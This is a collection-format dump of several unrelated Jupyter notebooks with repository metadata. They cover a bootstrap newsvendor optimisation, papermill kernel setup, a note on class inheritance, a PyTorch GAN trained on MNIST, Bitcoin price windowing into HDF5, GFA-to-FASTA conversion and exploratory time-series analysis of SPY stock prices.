sum(weight_bstrap[i] * (sell_price * z_bstrap[i] + waste_price * (x_bstrap - z_bstrap[i])) for i in scenarios_bstrap) - (cost_price * x_bstrap) \nM_bstrap.solve()\n\n\n##########################################\n# PRINT RESULTS\n##########################################\n\nprint(\"Status = %s\" % LpStatus[M_bstrap.status])\n\nprint(\"%s = %f\" % (x_bstrap.name, x_bstrap.varValue))\nfor i in scenarios_bstrap:\n print(\"%s = %f\" % (z_bstrap[i].name, z_bstrap[i].varValue))\nprint(\"Objective = %f\" % (M_bstrap.objective.value()))\n\n", "33.0\n0.13\n34.0\n0.87\nStatus = Optimal\nx_bstrap = 33.000000\nz_bstrap_1 = 33.000000\nz_bstrap_2 = 33.000000\nObjective = 33.000000\n" ] ], [ [ "#### d) CHECK AS TABLE (MANUAL CALCULATION): TO SEE CLEARLY WHAT HAPPENS", "_____no_output_____" ] ], [ [ "example_df_bstrap, example_df_summ_bstrap = result_summ(cluster_proportion_df=cluster_proportion_df_bstrap, \n demand=demand_bstrap, weight=weight_bstrap, \n sell_price=sell_price, cost_price=cost_price, \n waste_price=waste_price)\nexample_df_bstrap.head(n=5)", "_____no_output_____" ], [ "# optimal decision will only change if we increase sales_price (eg. sales_price = 23)\nexample_df_bstrap, example_df_summ_bstrap = result_summ(cluster_proportion_df=cluster_proportion_df_bstrap, \n demand=demand_bstrap, weight=weight_bstrap, \n sell_price=23, cost_price=cost_price, \n waste_price=waste_price)\nexample_df_bstrap.head(n=5)", "_____no_output_____" ] ], [ [ "#### d) VISUAL CHECK", "_____no_output_____" ] ], [ [ "example_df_bstrap.loc[:,'item_to_purchase'] = example_df_bstrap['item_to_purchase'].astype('str')", "_____no_output_____" ], [ "# check the weighted profit per possible scenario: \n# we can see how higher execution causes greater loss during weak demand and hence,\n# higher execution number has difficulty in bouncing the profit up \n\nfig, ax = plt.subplots()\n\nfor i in example_df_bstrap['item_to_purchase'].unique():\n example_df_bstrap[example_df_bstrap['item_to_purchase'] == i].plot.line(x='item_to_purchase', y='total_weighted_profit', ax=ax, label=str(i))\nplt.xticks(range(0,np.unique(example_df_bstrap['item_to_sell']).shape[0]),np.unique(example_df_bstrap['item_to_sell']),rotation=45)\nplt.show()", "_____no_output_____" ], [ "# check the total expected profit, which comes from all possible profit \n# and weighted by the probability of the scenario to happen\nplt.figure()\nsns.scatterplot(x='item_to_purchase', y='total_weighted_profit', data=example_df_summ_bstrap)\nplt.show()", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ] ]
e7308907a894c0c731ed1f89768355fac0b5fd3f
4,735
ipynb
Jupyter Notebook
Prepare_papermill_schulung3.ipynb
geomar-od-lagrange/papermill-demo
12a410bd84e4eb3e0379fa6a9b4a20f0105aa2a3
[ "MIT" ]
null
null
null
Prepare_papermill_schulung3.ipynb
geomar-od-lagrange/papermill-demo
12a410bd84e4eb3e0379fa6a9b4a20f0105aa2a3
[ "MIT" ]
2
2021-02-09T09:57:07.000Z
2021-02-10T16:58:41.000Z
Prepare_papermill_schulung3.ipynb
geomar-od-lagrange/papermill-demo
12a410bd84e4eb3e0379fa6a9b4a20f0105aa2a3
[ "MIT" ]
null
null
null
39.789916
158
0.594298
[ [ [ "# Prepare papermill for schulung3.geomar.de\n\n1. Make sure you have activated the correct kernel\n2. Install kernel manually", "_____no_output_____" ] ], [ [ "!python -m ipykernel install --user --name py3_lagrange_v2.2.2", "Installed kernelspec py3_lagrange_v2.2.2 in /home/jupyter-wrath/.local/share/jupyter/kernels/py3_lagrange_v2.2.2\n" ], [ "!jupyter kernelspec list", "[ListKernelSpecs] WARNING | Config option `kernel_spec_manager_class` not recognized by `ListKernelSpecs`.\nAvailable kernels:\n conda-env-monitoring-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-monitoring-py\n conda-env-py3_euler-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_euler-py\n conda-env-py3_euler_brokenline-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_euler_brokenline-py\n conda-env-py3_euler_brokenline_2020.08.20.1-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_euler_brokenline_2020.08.20.1-py\n conda-env-py3_euler_intake-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_euler_intake-py\n conda-env-py3_euler_xoak-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_euler_xoak-py\n conda-env-py3_lagrange-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_lagrange-py\n conda-env-py3_lagrange_dev-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_lagrange_dev-py\n conda-env-py3_lagrange_parcels-dev-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_lagrange_parcels-dev-py\n conda-env-py3_lagrange_parcels-v2.2.0-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_lagrange_parcels-v2.2.0-py\n conda-env-py3_lagrange_v2.0.0-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_lagrange_v2.0.0-py\n conda-env-py3_lagrange_v2.2.2-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_lagrange_v2.2.2-py\n conda-env-py3_xoak-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_xoak-py\n conda-root-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-root-py\n py3_lagrange_v2.2.2 /home/jupyter-wrath/.local/share/jupyter/kernels/py3_lagrange_v2.2.2\n python3 /opt/tljh/user/envs/py3_lagrange_v2.2.2/share/jupyter/kernels/python3\n" ] ], [ [ "## Run papermill on schulung3.geomar.de", "_____no_output_____" ] ], [ [ "!papermill original_notebooks/01_papermill_demo.ipynb evaluated_notebooks/01_papermill_demo.ipynb -k py3_lagrange_v2.2.2", "Input Notebook: original_notebooks/01_papermill_demo.ipynb\nOutput Notebook: evaluated_notebooks/01_papermill_demo.ipynb\nExecuting: 0%| | 0/6 [00:00<?, ?cell/s]Executing notebook with kernel: py3_lagrange_v2.2.2\nExecuting: 100%|████████████████████████████████| 6/6 [00:02<00:00, 2.71cell/s]\n" ] ] ]
[ "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ] ]
e730961b9e6ab816f8061928929fce5429660f01
2,247
ipynb
Jupyter Notebook
object-oriented-programming/inheritance.ipynb
RatanShreshtha/Crash-Course-Computer-Science
c03054c89d0853051f9bacf08529d0579e885995
[ "MIT" ]
1
2020-09-08T12:50:37.000Z
2020-09-08T12:50:37.000Z
object-oriented-programming/inheritance.ipynb
RatanShreshtha/crash-course
c03054c89d0853051f9bacf08529d0579e885995
[ "MIT" ]
null
null
null
object-oriented-programming/inheritance.ipynb
RatanShreshtha/crash-course
c03054c89d0853051f9bacf08529d0579e885995
[ "MIT" ]
null
null
null
47.808511
606
0.70316
[ [ [ "# Inheritance\n\nObjects are often very similar. They share common logic. But they’re not entirely the same. Ugh… So how do we reuse the common logic and extract the unique logic into a separate class? One way to achieve this is inheritance. Inheritance allows classes to inherit features of other classes. Put another way, parent classes extend attributes and behaviors to child classes. Inheritance supports reusability – if basic attributes and behaviors are defined in a parent class, child classes can be created extending the functionality of the parent class, and adding additional attributes and behaviors.\n\nLet’s say that teachers and students are a special type of person that have subjects to tech and learn and few more information and behaviours. We can create child classes `Teacher` and `Student` from the parent class `Person`, and then add behaviors. The benefits of inheritance are programs can create a generic parent class, and then create more specific child classes as needed. This simplifies overall programming, because instead of recreating the structure of the `Person` class multiple times, **child classes can extend the functionality of a parent class**.\n\n<!-- ![Inheritance](./images/inheritance.png) -->\n\n## Benefits of inheritance:\n\n- Code reuse: create generic classes, and then create more specific classes as needed which inherit from generic classes\n- Code organisation: inheritance makes you think about structures of your in term of generic to specific objects", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown" ] ]
e7309d948db205106750d47a59375f93fe090079
272,632
ipynb
Jupyter Notebook
SimpleGAN.ipynb
Pi-Akash/Pytorch-Learnings
e1737747638af1482bca58fbb14335df6422f138
[ "MIT" ]
null
null
null
SimpleGAN.ipynb
Pi-Akash/Pytorch-Learnings
e1737747638af1482bca58fbb14335df6422f138
[ "MIT" ]
null
null
null
SimpleGAN.ipynb
Pi-Akash/Pytorch-Learnings
e1737747638af1482bca58fbb14335df6422f138
[ "MIT" ]
null
null
null
622.447489
120,012
0.947651
[ [ [ "# A few resources which has helped me understand the topic better:\n# - https://www.youtube.com/watch?v=ZIvhuC0srXs\n# - https://jonathan-hui.medium.com/gan-whats-generative-adversarial-networks-and-its-application-f39ed278ef09\n# - https://www.youtube.com/watch?v=OljTVUVzPpM&list=PLhhyoLH6IjfwIp8bZnzX8QR30TRcHO8Va&index=2", "_____no_output_____" ], [ "# importing libraries\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nfrom torch.utils.data import DataLoader\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom torch.utils.tensorboard import SummaryWriter\nfrom datetime import datetime", "_____no_output_____" ], [ "# path where my resources are in local\npath = \"D:/Datasets/GANS\"\nos.chdir(path)", "_____no_output_____" ], [ "# you can play around with this to add more complex transformations.\n# the dataset is very small so I have added a few transformation to increase the count.\n# the transformations are pretty self explanatory\n# if you are going to use an external dataset, then feel free to uncomment the below transformations\ntransform = transforms.Compose([\n #transforms.Resize(28),\n #transforms.Grayscale(1),\n transforms.ToTensor(),\n #transforms.RandomHorizontalFlip(p=0.5),\n #transforms.RandomVerticalFlip(p=0.5)\n])", "_____no_output_____" ], [ "# hyperparameters\ndevice = \"cpu\" # i dont have a gpu.\nlr = 3e-4 \nnotebook = False", "_____no_output_____" ], [ "# you can find the dataset i have used in the below link:\n# https://www.kaggle.com/cactus3/basicshapes\n\n# uncomment the below line if you are using a dataset from local, and provide necessary folder location.\n# dataset = datasets.ImageFolder(\"Shapes/training_set\", transform = transform)\nbatch_size = 32\ndataset = datasets.MNIST(root=\"SimpleGansMNIST/\", transform = transform, download = True)\nloader = torch.utils.data.DataLoader(dataset, batch_size = batch_size, shuffle = True)", "_____no_output_____" ], [ "# lets see if our data is properly loaded\ndef plot_images(images):\n imgs = torchvision.utils.make_grid(images)\n npimgs = imgs.numpy()\n plt.figure(figsize = (8, 8))\n plt.imshow(np.transpose(npimgs, (1,2,0)), cmap = 'gray')\n plt.xticks([])\n plt.yticks([])\n plt.show()", "_____no_output_____" ], [ "examples_data, examples_labels = next(iter(loader))\nprint(examples_data.shape, examples_labels.shape)\n\nif notebook == True:\n plot_images(examples_data)", "torch.Size([32, 1, 28, 28]) torch.Size([32])\n" ], [ "# Z_dim is the input vector of 100 dim to the generator\n# Z_dim vector will be sampled from gaussian dstribution with 0 mean and 1 std\nZ_dim = 100\n\n# H_dim is the no of hidden nodes in the hidden layer\nH_dim = 256\n\n# X_dim is the flattened input vector to the neural network\nX_dim = examples_data.view(examples_data.shape[0], -1).shape[-1]\n\nprint(Z_dim, H_dim, X_dim)", "100 256 784\n" ], [ "# Generator Model\n# 1 hidden layer sequential model\nclass Generator(nn.Module):\n def __init__(self, generator_input_dim, output_image_dim):\n super(Generator, self).__init__()\n self.model = nn.Sequential(\n nn.Linear(generator_input_dim, H_dim),\n nn.LeakyReLU(0.1),\n nn.Linear(H_dim, output_image_dim),\n nn.Sigmoid(),\n )\n \n def forward(self, x):\n return self.model(x)", "_____no_output_____" ], [ "# No error, the implementation for generator looks good\nG = Generator(Z_dim, X_dim)", "_____no_output_____" ], [ "# Discriminator model\n# 1 hidden layer sequential model\nclass Discriminator(nn.Module):\n def __init__(self, input_image_dim):\n super(Discriminator, self).__init__()\n self.model = nn.Sequential(\n nn.Linear(input_image_dim, H_dim),\n nn.LeakyReLU(0.1),\n nn.Linear(H_dim, 1),\n nn.Sigmoid()\n )\n \n def forward(self, x):\n return self.model(x)", "_____no_output_____" ], [ "# No error, the implementation for discriminator looks good\nD = Discriminator(X_dim)", "_____no_output_____" ], [ "G_opt = optim.Adam(G.parameters(), lr = lr)\nD_opt = optim.Adam(D.parameters(), lr = lr)\n\n# summary writers\nwriter_fake = SummaryWriter(\"TensorboardFiles/simpleGans/runs/fake\")\nwriter_real = SummaryWriter(\"TensorboardFiles/simpleGans/runs/real\")\nsteps = 0 # global steps", "_____no_output_____" ], [ "# training loop\nn_epochs = 2\nstart = datetime.now()\nfor epoch in range(n_epochs):\n # setting initial loss values before every epoch\n G_loss_run = 0.0\n D_loss_run = 0.0\n \n for batch_idx, data in enumerate(loader):\n Real, _ = data\n batch_size = Real.shape[0]\n # reshaping the data into (batch_size, 784) matrix\n Real = Real.view(Real.shape[0], -1).to(device)\n \n # In discriminator we are trying to train it to better differentiate between real and false images\n # forward propagation for discriminator\n # true labels to match with real images during loss calculation\n one_labels = torch.ones(batch_size, 1)\n # false labels to match with fake images during loss calculation\n zero_labels = torch.zeros(batch_size, 1)\n \n # generating noise, which is input for generator\n noise = torch.randn(batch_size, Z_dim).to(device)\n \n # discriminator returns a value in between 0 and 1,\n # the returned value is compared against the true/false labels\n Disc_real = D(Real) # shape : (batch_size, (0 to 1))\n Disc_fake = D(G(noise)) # shape : (batch_size, (0 to 1))\n \n # crossentropy loss for real images\n Disc_real_loss = F.binary_cross_entropy(Disc_real, one_labels)\n # crossentropy loss for fake images\n Disc_fake_loss = F.binary_cross_entropy(Disc_fake, zero_labels)\n # total loss for discriminator\n Disc_loss = Disc_real_loss + Disc_fake_loss\n \n # backpropagation\n D_opt.zero_grad()\n Disc_loss.backward()\n D_opt.step()\n \n # forward propagation for generator\n # First, we use some noise to generate a random image.\n # the image is then fed to discriminator, so that it provides a value between 0 and 1.\n # because we are training discriminator before the generator so the discrimitor will always be one step ahead.\n # this advantage of discriminator helps discriminator give better probability value for the fake image.\n # the returned value is then used to figure out how well the generator has produced the fake image\n # so the generator will use a crossentropy loss to figure out what is the difference between the labels for fake image and actal images\n \n # noise, input to generator\n noise = torch.randn(batch_size, Z_dim).to(device)\n Disc_fake = D(G(noise))\n Gen_loss = F.binary_cross_entropy(Disc_fake, one_labels)\n \n # backpropagration\n G_opt.zero_grad()\n Gen_loss.backward()\n G_opt.step()\n \n # we are adding overall loss for discriminator and generator for all the iterations in an epoch\n G_loss_run += Gen_loss.item()\n D_loss_run += Disc_loss.item()\n \n if epoch % 2 == 0:\n print(\"Epoch : {}, Gen_loss : {}, Disc_loss : {}\".format(epoch+1, G_loss_run/batch_idx+1, D_loss_run/batch_idx+1))\n \n # we dont want to compute gradient for this step, therefore .detach()\n sample_fake = G(noise).detach()\n sample_fake = sample_fake.view(sample_fake.shape[0], 1, 28, 28)\n sample_real = data[0]\n \n # making grids for tensorboard\n img_grid_fake = torchvision.utils.make_grid(sample_fake, normalize = True)\n img_grid_real = torchvision.utils.make_grid(sample_real, normalize = True)\n \n writer_fake.add_image(\n \"MNIST Fake Images\", img_grid_fake, global_step = step\n )\n \n writer_real.add_image(\n \"MNIST Real Images\", img_grid_real, global_step = step\n )\n \n step += 1\n \n if notebook == True:\n #print(sample_fake.shape, sample_real.shape)\n plot_images(sample_fake)\n plot_images(sample_real)\n ", "Epoch : 1, Gen_loss : 4.277582804955693, Disc_loss : 1.243619375160459\ntorch.Size([32, 1, 28, 28]) torch.Size([32, 1, 28, 28])\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e7309eb1349809292545c3e13e4b3ab8f09cbf70
7,532
ipynb
Jupyter Notebook
2_PastSampler.ipynb
psmishra7/CryptocurrencyPrediction
96f85ba45d1acbd531ad86f7f9ba32b9acd3ddaf
[ "MIT" ]
null
null
null
2_PastSampler.ipynb
psmishra7/CryptocurrencyPrediction
96f85ba45d1acbd531ad86f7f9ba32b9acd3ddaf
[ "MIT" ]
null
null
null
2_PastSampler.ipynb
psmishra7/CryptocurrencyPrediction
96f85ba45d1acbd531ad86f7f9ba32b9acd3ddaf
[ "MIT" ]
null
null
null
31.647059
85
0.519915
[ [ [ "\nimport numpy as np\nimport pandas as pd\n \nclass PastSampler:\n '''\n Forms training samples for predicting future values from past value\n '''\n \n def __init__(self, N, K, sliding_window = True):\n '''\n Predict K future sample using N previous samples\n '''\n self.K = K\n self.N = N\n self.sliding_window = sliding_window\n \n def transform(self, A):\n M = self.N + self.K #Number of samples per row (sample + target)\n #indexes\n if self.sliding_window:\n I = np.arange(M) + np.arange(A.shape[0] - M + 1).reshape(-1, 1)\n else:\n if A.shape[0]%M == 0:\n I = np.arange(M)+np.arange(0,A.shape[0],M).reshape(-1,1)\n \n else:\n I = np.arange(M)+np.arange(0,A.shape[0] -M,M).reshape(-1,1)\n \n B = A[I].reshape(-1, M * A.shape[1], A.shape[2])\n ci = self.N * A.shape[1] #Number of features per sample\n return B[:, :ci], B[:, ci:] #Sample matrix, Target matrix\n\n#data file path\ndfp = 'data/bitcoin2015to2017.csv'\n\n#Columns of price data to use\ncolumns = ['Close']\ndf = pd.read_csv(dfp)\ntime_stamps = df['Timestamp']\ndf = df.loc[:,columns]\noriginal_df = pd.read_csv(dfp).loc[:,columns]", "_____no_output_____" ], [ "\nfile_name='bitcoin2015to2017_close.h5'\n\nfrom sklearn.preprocessing import MinMaxScaler\nscaler = MinMaxScaler()\n# normalization\nfor c in columns:\n df[c] = scaler.fit_transform(df[c].values.reshape(-1,1))\n \n#Features are input sample dimensions(channels)\nA = np.array(df)[:,None,:]\noriginal_A = np.array(original_df)[:,None,:]\ntime_stamps = np.array(time_stamps)[:,None,None]\n\n#Make samples of temporal sequences of pricing data (channel)\nNPS, NFS = 256, 16 #Number of past and future samples\nps = PastSampler(NPS, NFS, sliding_window=False)\nB, Y = ps.transform(A)\ninput_times, output_times = ps.transform(time_stamps)\noriginal_B, original_Y = ps.transform(original_A)\n\nimport h5py\nwith h5py.File(file_name, 'w') as f:\n f.create_dataset(\"inputs\", data = B)\n f.create_dataset('outputs', data = Y)\n f.create_dataset(\"input_times\", data = input_times)\n f.create_dataset('output_times', data = output_times)\n f.create_dataset(\"original_datas\", data=np.array(original_df))\n f.create_dataset('original_inputs',data=original_B)\n f.create_dataset('original_outputs',data=original_Y)", "_____no_output_____" ] ], [ [ "import numpy as np\nimport pandas as pd\n \nclass PastSampler:\n '''\n Forms training samples for predicting future values from past value\n '''\n \n def __init__(self, N, K, sliding_window = True):\n '''\n Predict K future sample using N previous samples\n '''\n self.K = K\n self.N = N\n self.sliding_window = sliding_window\n \n def transform(self, A):\n M = self.N + self.K #Number of samples per row (sample + target)\n #indexes\n if self.sliding_window:\n I = np.arange(M) + np.arange(A.shape[0] - M + 1).reshape(-1, 1)\n else:\n if A.shape[0]%M == 0:\n I = np.arange(M)+np.arange(0,A.shape[0],M).reshape(-1,1)\n \n else:\n I = np.arange(M)+np.arange(0,A.shape[0] -M,M).reshape(-1,1)\n \n B = A[I].reshape(-1, M * A.shape[1], A.shape[2])\n ci = self.N * A.shape[1] #Number of features per sample\n return B[:, :ci], B[:, ci:] #Sample matrix, Target matrix\n\n#data file path\ndfp = 'data/4coins_17apr2021.csv'\n\n#Columns of price data to use\ncolumns = ['close']\n# df = pd.read_csv(dfp).dropna().tail(1000000)\ndf = pd.read_csv(dfp)\ntime_stamps = df['date']\ndf = df.loc[:,columns]\n# original_df = pd.read_csv(dfp).dropna().tail(1000000).loc[:,columns]\noriginal_df = pd.read_csv(dfp).loc[:,columns]", "_____no_output_____" ], [ "file_name='bitcoin2015to2017_close.h5'\n\ndfp = 'data/bitcoin2015to2017.csv'", "_____no_output_____" ], [ "from sklearn.preprocessing import MinMaxScaler\nscaler = MinMaxScaler()\n# normalization\nfor c in columns:\n df[c] = scaler.fit_transform(df[c].values.reshape(-1,1))\n", "_____no_output_____" ], [ "#%%Features are channels\nA = np.array(df)[:,None,:]\noriginal_A = np.array(original_df)[:,None,:]\ntime_stamps = np.array(time_stamps)[:,None,None]\n#%%Make samples of temporal sequences of pricing data (channel)\nNPS, NFS = 256, 16 #Number of past and future samples\nps = PastSampler(NPS, NFS, sliding_window=False)\nB, Y = ps.transform(A)\ninput_times, output_times = ps.transform(time_stamps)\noriginal_B, original_Y = ps.transform(original_A)", "_____no_output_____" ], [ "import h5py\nwith h5py.File(file_name, 'w') as f:\n f.create_dataset(\"inputs\", data = B)\n f.create_dataset('outputs', data = Y)\n f.create_dataset(\"input_times\", data = input_times)\n f.create_dataset('output_times', data = output_times)\n f.create_dataset(\"original_datas\", data=np.array(original_df))\n f.create_dataset('original_inputs',data=original_B)\n f.create_dataset('original_outputs',data=original_Y)\n# f.create_dataset('original_times', data=time_stamps)", "_____no_output_____" ], [ "B.shape", "_____no_output_____" ] ] ]
[ "code", "raw" ]
[ [ "code", "code" ], [ "raw", "raw", "raw", "raw", "raw", "raw" ] ]
e730af3d45d9a37fd4655b175ec3e24a8c132c19
2,184
ipynb
Jupyter Notebook
jupyter/gfa_to_fasta.ipynb
linsalrob/EdwardsLab
3d4eef1dda61c31ce8163d94d86f186275a6e4a4
[ "MIT" ]
30
2015-01-25T16:22:51.000Z
2022-01-20T15:56:47.000Z
jupyter/gfa_to_fasta.ipynb
linsalrob/EdwardsLab
3d4eef1dda61c31ce8163d94d86f186275a6e4a4
[ "MIT" ]
2
2020-04-13T15:00:37.000Z
2020-09-23T12:35:59.000Z
jupyter/gfa_to_fasta.ipynb
linsalrob/EdwardsLab
3d4eef1dda61c31ce8163d94d86f186275a6e4a4
[ "MIT" ]
24
2015-04-17T00:52:05.000Z
2021-11-26T17:50:01.000Z
21.203883
76
0.46337
[ [ [ "import os\nimport sys", "_____no_output_____" ], [ "fname = 'C:\\\\Users\\edwa0468\\Downloads\\ED287_S7_assembly.gfa'\noname = 'C:\\\\Users\\edwa0468\\Downloads\\ED287_S7_assembly.fasta'\nwith open(fname, 'r') as f:\n with open(oname, 'w') as out:\n for l in f:\n p = l.strip().split(\"\\t\")\n if p[0] == \"S\":\n out.write(f\">seq_{p[1]}\\n{p[2]}\\n\")\n print(f\"seq_{p[1]}\\t{len(p[2])}\")", "seq_1\t1991367\nseq_2\t1917636\nseq_3\t1566043\nseq_4\t36676\nseq_5\t2938\nseq_6\t1342\nseq_7\t761\nseq_8\t588\nseq_9\t354\nseq_10\t316\nseq_11\t208\nseq_12\t202\nseq_13\t189\nseq_14\t149\nseq_15\t148\nseq_16\t129\nseq_17\t123\nseq_18\t121\nseq_19\t118\nseq_20\t108\nseq_21\t52\nseq_22\t51\nseq_23\t42\nseq_24\t39\nseq_25\t39\nseq_26\t36\nseq_27\t35\nseq_28\t34\nseq_29\t24\nseq_30\t20\nseq_31\t17\nseq_32\t14\nseq_33\t12\nseq_34\t10\nseq_35\t8\nseq_36\t2\nseq_37\t1\n" ] ] ]
[ "code" ]
[ [ "code", "code" ] ]
e730b3af146d9ca3a632987ebcfe7e8e5a0372ab
503,521
ipynb
Jupyter Notebook
00_Code/03_ExploratoryDataAnalysis.ipynb
bvarnam/StockPrediction
ce639d892d44d853d37ef889176bb9da1cce90a4
[ "MIT" ]
1
2022-01-07T22:12:35.000Z
2022-01-07T22:12:35.000Z
00_Code/03_ExploratoryDataAnalysis.ipynb
bvarnam/StockPrediction
ce639d892d44d853d37ef889176bb9da1cce90a4
[ "MIT" ]
null
null
null
00_Code/03_ExploratoryDataAnalysis.ipynb
bvarnam/StockPrediction
ce639d892d44d853d37ef889176bb9da1cce90a4
[ "MIT" ]
null
null
null
414.761944
112,072
0.926746
[ [ [ "# Intraday Trading via Day Trading Techniques & Indicators\n---\n\n### Data collected via AlphaVantage free API using extended intraday data. \n> https://www.alphavantage.co/documentation/\n\n---", "_____no_output_____" ], [ "# 03 - Exploratory Data Analysis", "_____no_output_____" ], [ "### Library Imports", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n%matplotlib inline\nplt.style.use('fivethirtyeight')\n\nfrom pandas.plotting import autocorrelation_plot\nfrom statsmodels.graphics.tsaplots import plot_acf\nfrom statsmodels.graphics.tsaplots import plot_pacf\nfrom statsmodels.tsa.seasonal import seasonal_decompose\n\nfrom statsmodels.tsa.stattools import adfuller\n# Code written by Joseph Nelson.\ndef interpret_dftest(dftest):\n dfoutput = pd.Series(dftest[0:2], index=['Test Statistic','p-value'])\n return dfoutput", "_____no_output_____" ] ], [ [ "# Read in Filtered Dataset", "_____no_output_____" ] ], [ [ "df = pd.read_csv('../01_Data/extended_intraday_SPY_1min_filtered.csv')\ndf.set_index(pd.DatetimeIndex(df['time']), inplace=True)\ndf.drop(columns = ['time'], inplace = True)", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ] ], [ [ "# Feature Exploration", "_____no_output_____" ], [ "Let's first look at our most important feature, 'close' price.", "_____no_output_____" ] ], [ [ "plt.figure(figsize=(18,9))\nplt.plot(df['close']);", "_____no_output_____" ] ], [ [ "**We see the large drop from COVID in early 2020, but overall nothing that would upset our models.**\n\n---\n**Is our data stationary?**\n\nTo answer this question, we apply the Augmented Dickey-Fuller Test and the accompanying function written by Joseph Nelson.", "_____no_output_____" ] ], [ [ "interpret_dftest(adfuller(df['close']))", "_____no_output_____" ] ], [ [ ">With a p value of .92, our data is most definitely NOT stationary. For an ARIMA model, we need our data to be stationary.\n\n**To achieve Stationarity, we apply the .diff() function to observe the changes rather than prices.**", "_____no_output_____" ] ], [ [ "plt.figure(figsize=(18,9))\nplt.plot(df['close'].diff());", "_____no_output_____" ], [ "interpret_dftest(adfuller(df['close'].diff().dropna()))", "_____no_output_____" ] ], [ [ ">With a p value of 0, our data is stationary.", "_____no_output_____" ] ], [ [ "df['close_first_diff'] = df['close'].diff()\ndf.head()", "_____no_output_____" ] ], [ [ "To avoid any issues created through our diff function, we will remove null values from our dataset.", "_____no_output_____" ] ], [ [ "df.shape", "_____no_output_____" ], [ "df.dropna(inplace=True)\ndf.shape", "_____no_output_____" ] ], [ [ "As expected, this only removed the first row due to the null value created from our diff function.", "_____no_output_____" ], [ "**Does our data have seasonality?**", "_____no_output_____" ] ], [ [ "decomp = seasonal_decompose(df['close'], period=1)\n\nwith plt.rc_context():\n plt.rc(\"figure\", figsize=(18,9))\n # Plot the decomposed time series.\n decomp.plot();", "_____no_output_____" ] ], [ [ "> Difficult to tell from this visual alone. We do not appear to have significant seasonality, but let's continue to analyze.", "_____no_output_____" ] ], [ [ "autocorrelation_plot(df['close']);", "_____no_output_____" ], [ "plot_acf(df['close'], lags=452);", "_____no_output_____" ], [ "plot_pacf(df['close'], lags=452);", "_____no_output_____" ] ], [ [ "**These are difficult to interpret. Because we have such a large amount of data on 1minute intervals, its difficult to visualize a useful correlation tool.**\n\n**We are focusing on intraday data, however, so let's try picking a random day and testing correlation inside of a day.**", "_____no_output_____" ] ], [ [ "test = df.query(\"time >= '2019-10-28' and time < '2019-10-29'\")\ntest.shape", "_____no_output_____" ] ], [ [ "We see that a typical day consists of 450 minute intervals, or about 7.5 hours. When considering that we wanted our time frame to be 9:00am to 4:30pm, we again see the 7.5 hours. So we know this was a correct split for a single day.", "_____no_output_____" ] ], [ [ "df.shape", "_____no_output_____" ], [ "df.shape[0] / 450", "_____no_output_____" ], [ "decomp = seasonal_decompose(test['close'], period=1)\n\nwith plt.rc_context():\n plt.rc(\"figure\", figsize=(18,9))\n # Plot the decomposed time series.\n decomp.plot();", "_____no_output_____" ], [ "autocorrelation_plot(test['close']);", "_____no_output_____" ], [ "plot_acf(test['close'], lags=448);", "_____no_output_____" ], [ "plot_pacf(test['close'], lags=223);", "_____no_output_____" ] ], [ [ ">These results are much easier to interpret. We see there is not significant correlation between close prices beyond the initial few lags, which is to be expected.", "_____no_output_____" ], [ "# Target Variable\n\n**Our target variable is split into 3 columns.**\n1. 'target' shows us the % move in 1 minute (already multiplied by 100)\n2. 'target_binary_class' tells us if it went up or down.\n3. 'target_multi_class' adds another dimension to the binary class column by including a class for if the price is relatively flat.", "_____no_output_____" ] ], [ [ "df['target'].describe()", "_____no_output_____" ] ], [ [ "**Our mean move is only 0.000095%, even after removing most of the pre-market and after hours data.**\n\n**However, our standard deviation is 0.056% which quickly incorporates most of our values.**\n- **3 standard deviations from our mean of about 0 would be +/- 0.168**\n---\nThis is described better visually:", "_____no_output_____" ] ], [ [ "plt.figure(figsize=(18,9))\ndf['target'].hist(bins=1000)\nplt.xlim(-0.2,0.2)\nplt.ylabel('Occurances')\nplt.xlabel('Price Movements in 1 Minute')\nplt.title('Distribution of Target Variable');", "_____no_output_____" ] ], [ [ "> We seem to have a very normally distributed target variable with mean of about 0.\n\n**Incorporating what we know about the S&P500, specifically the ticker SPY, we know that the stock price is very stable and we see that described here by very small movements from minute to minute.**", "_____no_output_____" ] ] ]
